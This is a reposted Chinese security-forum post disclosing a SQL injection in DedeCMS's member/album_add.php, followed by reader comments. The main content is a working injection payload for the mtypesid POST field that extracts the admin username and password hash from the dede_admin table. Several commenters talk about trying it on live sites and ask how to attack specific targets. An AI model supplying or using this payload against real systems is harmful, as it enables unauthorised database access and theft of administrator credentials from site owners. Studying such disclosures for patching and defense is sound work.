(转载)dedecms(织梦)album_add.php sql注入漏洞

2013-10-08 14:55:56 21 xiaodi 5111

dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的，目前最新版本应该是没修复的

漏洞需要会员，所以比较鸡肋啦
发表文章处，post表单的mtypesid可以注入
/dedecmsnew/member/album_add.php

注入POC：

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'','','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

作者：句子

类别 Web安全

关于作者

xiaodi9篇文章660篇回复

我是小迪，我为自己代言。

xiaodi

评论21次

要评论？请先登录或注册

21楼

1006079161
2014-2-13 00:44

支持下，但Dede的会员功能几乎都关了！哎，鸡肋

回复|@ta|踩(0)|顶(0)
20楼

再见江南
2013-12-19 10:29

后台地址还是挺难找的

回复|@ta|踩(0)|顶(0)
19楼

hzzork
2013-11-7 18:21

会员要开启哦

回复|@ta|踩(0)|顶(0)
18楼

guhun
2013-10-11 16:01

目测现在很多网站都是直接关闭掉了会员注册，即使没有关闭，后台也是个让人蛋疼的事情不过还是感谢分享

回复|@ta|踩(0)|顶(0)
17楼

wsm123
2013-10-11 10:47

需要会员...不是很好

回复|@ta|踩(0)|顶(0)
16楼

akiho
2013-10-10 20:06

= = 鸡肋的地方就是会员么

回复|@ta|踩(0)|顶(0)
15楼

zxsk2222
2013-10-10 01:42

那么，现在在哪儿才能找到一个带会员xi统的DEDE呢？

回复|@ta|踩(0)|顶(0)
14楼

shuiwuxie
2013-10-9 16:49

dede见到开通会员注册的都有点难了

回复|@ta|踩(0)|顶(0)
13楼

kaerlite
2013-10-9 11:55

dedecms 已经被蹂躏得···

回复|@ta|踩(0)|顶(0)
12楼

weiweiwind
2013-10-9 10:40

这帖子被转来转去的。。。

回复|@ta|踩(0)|顶(0)
11楼

neutrino
2013-10-8 22:55

不鸡肋啊。

回复|@ta|踩(0)|顶(0)
10楼

seaman
2013-10-8 21:01

我遇到一个dede站输入member/album_add.php 显示的是一片空白这个能搞吗？

回复|@ta|踩(0)|顶(0)
9楼

不是我干的
2013-10-8 20:23

post表单的mtypesid可以注入。。。】、不知道具体怎么注入，有语句吗

回复|@ta|踩(0)|顶(0)
8楼

skysheep
2013-10-8 19:29

good 收下转载出去的出去的没有小JJ

回复|@ta|踩(0)|顶(0)
7楼

wepeng
2013-10-8 19:19

dede多灾多难呀]]]]]]]]]]]]]]]]

回复|@ta|踩(0)|顶(0)
6楼

hkleander
2013-10-8 16:26

DEDE 现在真的好难碰有会员功能的站了。

回复|@ta|踩(0)|顶(0)
5楼

xiaok1995
2013-10-8 15:34

去试试吧，，。。。

回复|@ta|踩(0)|顶(0)
4楼

注册用户
2013-10-8 15:34

图集功能木开。。

回复|@ta|踩(0)|顶(0)
3楼

sxdmsr
2013-10-8 15:27

要会员，有时候是真的很蛋疼啊

回复|@ta|踩(0)|顶(0)
2楼

2250086856
2013-10-8 15:23

好啊啊啊啊啊啊！！！！！！

回复|@ta|踩(0)|顶(0)